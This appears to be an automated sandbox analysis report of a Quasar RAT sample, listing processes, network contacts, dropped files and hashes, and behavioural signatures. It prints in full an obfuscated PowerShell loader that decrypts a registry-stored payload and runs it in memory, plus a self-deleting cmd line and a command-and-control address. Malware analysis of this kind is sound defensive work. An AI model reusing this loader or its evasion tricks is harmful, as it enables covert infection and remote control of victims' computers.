[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{3ec00975-2522-4e40-adf0-4435a70b2e38}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{022663ae-862b-4f38-a00d-dbb525a00dd4}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{d504caaa-c79c-453c-b1bc-18ebb1c7ea53}

C:\Windows\$sxr-powershell.exe

"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1452).WaitForExit();[System.Threading.Thread]::Sleep(5000); function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{38ad70bf-959b-489e-ae2d-e25d46f9883e}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{ec756ae8-5314-4cca-9af8-edd1eb90eafe}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{384b7751-ac97-498f-b52f-ad379fcc381b}

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{86b6c022-1e9c-4c44-833a-580a6c38975b}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{28aee83c-e9e1-4138-9f04-c7b6086bb192}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{76204e13-a5bc-44b3-bc60-508b516c4779}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{70f4f242-a443-4a22-a078-f94ca82ec1ed}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{b3372018-fd1f-4b9c-998d-97b33aa5acbb}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{11b3a8ff-bc30-4d0b-a3a8-6f8035d59d47}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{339bbc9e-4285-411e-96ac-20fb030e4855}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{e773df86-6fe6-4810-b7f8-c2aa615e2636}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{3f218a6a-9b04-4d80-9875-a8c7a6f6521e}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{420c71f7-7ee7-4613-a4cc-a63ec0aacd4a}

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{b5360dd6-5335-4280-946c-fa392e87983c}

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4332 -ip 4332

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 452

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{8a085641-610b-427f-9256-018d026f60bd}

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6980 -ip 6980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6980 -s 460

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{09a3e476-c522-411b-96b1-45e811dc9e90}

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 632 -p 6212 -ip 6212

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{6b4b94ba-5618-4a54-88ca-c5c3af5cc13f}

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 6212 -s 308

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & exit

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

PING localhost -n 8

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 138.201.86.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
FR 163.5.215.216:4782 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
FR 163.5.215.216:4782 tcp

Files

memory/2724-0-0x00007FFEF8593000-0x00007FFEF8595000-memory.dmp

memory/2724-1-0x000002090B680000-0x000002090B83E000-memory.dmp

memory/2724-2-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp

memory/2724-3-0x0000020926F00000-0x0000020926FE0000-memory.dmp

memory/2724-4-0x0000020927190000-0x0000020927336000-memory.dmp

memory/2724-5-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp

memory/2724-6-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vcp0kky2.5ou.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2096-16-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp

memory/2096-17-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp

memory/2096-18-0x00000212FD790000-0x00000212FD7B2000-memory.dmp

memory/2096-19-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp

memory/2724-20-0x00007FFEF8593000-0x00007FFEF8595000-memory.dmp

memory/2724-21-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/2096-35-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp

memory/2248-36-0x00000263B24E0000-0x00000263B2504000-memory.dmp

memory/2248-38-0x00007FFF16290000-0x00007FFF1634E000-memory.dmp

memory/2248-37-0x00007FFF167F0000-0x00007FFF169E5000-memory.dmp

memory/2248-39-0x00000263CB7A0000-0x00000263CC1F0000-memory.dmp

memory/2248-41-0x00000263CC1F0000-0x00000263CC296000-memory.dmp

memory/2248-42-0x00000263CB4F0000-0x00000263CB546000-memory.dmp

memory/2248-43-0x00000263CC2A0000-0x00000263CC2F8000-memory.dmp

memory/2248-44-0x00000263B2510000-0x00000263B2532000-memory.dmp

memory/2248-45-0x00007FFF167F0000-0x00007FFF169E5000-memory.dmp

memory/2248-47-0x00000263CB150000-0x00000263CB15A000-memory.dmp

memory/3512-48-0x0000000140000000-0x0000000140004000-memory.dmp

memory/4516-50-0x0000000000400000-0x0000000000406000-memory.dmp

memory/3512-49-0x0000000140000000-0x0000000140004000-memory.dmp

memory/4516-51-0x0000000000400000-0x0000000000406000-memory.dmp

C:\Windows\$sxr-mshta.exe

MD5 0b4340ed812dc82ce636c00fa5c9bef2
SHA1 51c97ebe601ef079b16bcd87af827b0be5283d96
SHA256 dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512 d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

C:\Windows\$sxr-cmd.exe

MD5 8a2122e8162dbef04694b9c3e0b6cdee
SHA1 f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256 b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA512 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

memory/1452-74-0x00007FFF167F0000-0x00007FFF169E5000-memory.dmp

memory/1452-75-0x00007FFF16290000-0x00007FFF1634E000-memory.dmp

memory/1452-76-0x000002A6C1CA0000-0x000002A6C2224000-memory.dmp

memory/1452-77-0x000002A6CA6F0000-0x000002A6CAEBA000-memory.dmp

memory/1452-78-0x000002A6CAEC0000-0x000002A6CB2FE000-memory.dmp

memory/1452-79-0x000002A6CB300000-0x000002A6CB3B2000-memory.dmp

memory/1452-80-0x000002A6C1980000-0x000002A6C19A2000-memory.dmp

memory/1452-81-0x00007FFF167F0000-0x00007FFF169E5000-memory.dmp

memory/1452-89-0x000002A6C2BD0000-0x000002A6C2C20000-memory.dmp

memory/1452-90-0x000002A6C2CE0000-0x000002A6C2D92000-memory.dmp

memory/1452-91-0x000002A6C2F70000-0x000002A6C3132000-memory.dmp

memory/1452-101-0x000002A6C2C20000-0x000002A6C2C5C000-memory.dmp

memory/1452-102-0x000002A6C2B80000-0x000002A6C2BCE000-memory.dmp

memory/1452-104-0x00007FFF16290000-0x00007FFF1634E000-memory.dmp

memory/1452-105-0x000002A6C2C60000-0x000002A6C2C96000-memory.dmp

memory/1452-103-0x00007FFF167F0000-0x00007FFF169E5000-memory.dmp

memory/4864-106-0x0000000140000000-0x0000000140028000-memory.dmp

memory/4864-107-0x0000000140000000-0x0000000140028000-memory.dmp

memory/4864-109-0x00007FFF16290000-0x00007FFF1634E000-memory.dmp

memory/4864-108-0x00007FFF167F0000-0x00007FFF169E5000-memory.dmp

memory/3024-110-0x0000000000400000-0x0000000000420000-memory.dmp

memory/3024-111-0x0000000000400000-0x0000000000420000-memory.dmp

memory/4864-113-0x0000000140000000-0x0000000140028000-memory.dmp

memory/612-117-0x00000173C6C30000-0x00000173C6C52000-memory.dmp

memory/1020-122-0x0000013B75EE0000-0x0000013B75F07000-memory.dmp

memory/668-143-0x00007FFED6870000-0x00007FFED6880000-memory.dmp

memory/612-131-0x00007FFED6870000-0x00007FFED6880000-memory.dmp

memory/668-126-0x000001A7814A0000-0x000001A7814C7000-memory.dmp

memory/612-121-0x00000173C6C60000-0x00000173C6C87000-memory.dmp

memory/1020-133-0x00007FFED6870000-0x00007FFED6880000-memory.dmp

memory/3024-115-0x0000000000400000-0x0000000000420000-memory.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER93B0.tmp.csv

MD5 81b6a1aa910498f1b9f06a92554453c7
SHA1 4c9b88339aacc52b0cae5549f1044d23902aade2
SHA256 1986f4095088dc6ec0d62478ad96282f034d33f0cb9966811ab676196710bba0
SHA512 992bd45b12f7adb74a7760b91e045a3ab7fbdf6540c4e9b7a03547ed00e26242f75948f5ae4d6b195fc3fe46986b9e2274ea8981ce5f78694c7172da28413230

C:\ProgramData\Microsoft\Windows\WER\Temp\WER93D0.tmp.txt

MD5 2ff2d0f22cfe74a4c03fa415fb61613d
SHA1 3dc75fdeed4c5d470dad4645431eb069448525a5
SHA256 7b2a2a42d529f4b8f43b050853f4914b7c521ce94d33c19d5c4689afc51b985b
SHA512 0e0b55e132ac3d75439a8e2cff48f78a0f9662d693a434b60f7edd276a8bb366a26d32ca55e1da95375095601ccff0bf4367167d0fa371dac20d9b2f22edcdfd

C:\ProgramData\Microsoft\Windows\WER\Temp\WER943E.tmp.csv

MD5 6be419f46a1070a4f7586d03536ec634
SHA1 6307315ec2cbf31e9f878c1d69ea91d78d81e4ac
SHA256 ee93755e9409aa4914055e2247c00ebde6da8f73f12d6294a7b9c5afd5b265b9
SHA512 48911ee88e830898db5bf9dbe970c945d9ff89d641fe77b7ba12d0ed28b77bd84e21c4ccbb3dacfe503a16642e8d7282a65b7f128736a8a1eb08eedd9ca9b039

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9450.tmp.txt

MD5 e6f4de895e2235f6f56667b098b38ace
SHA1 18aa5b7b8f62e7959c1f64db4683b55d47f6e00d
SHA256 7fe01fe3002f96bb8259bf7102e7ff03c000b19dc43ba99fb4111dc130d4eab3
SHA512 1baf657b291066d3198e4ecc361325aa17aaefb39f1dc00fc5903a0c686d59651cefcc8b5eb9160d9408795887f4e9dd8538f800ba3d567a832fcef658c40c84

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9460.tmp.txt

MD5 d5329c62382169aa20e0782e647bd479
SHA1 2baa25cee8611a3d0f5140e73f96fd223bf87228
SHA256 08a20fb30fb89c6be1aa5262aec8e70dee8b69f32405c6afe0ac30aa2e900493
SHA512 0829ab94269729392ac47c6b7350f54746932f2bb171430a1b56eac06e80d308443f802538671337e5edfa2efaf59c7997429abb4dcd2197512a23e4c0506732

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-18 13:35

Reported

2024-08-18 13:37

Platform

win10v2004-20240802-en

Max time kernel

60s

Max time network

60s

Command Line

winlogon.exe

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 5804 created 376 N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\dllhost.exe

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation C:\Windows\$sxr-mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A

Indicator Removal: Clear Windows Event Logs

defense_evasion
Description Indicator Process Target
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A

Hide Artifacts: Hidden Window

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
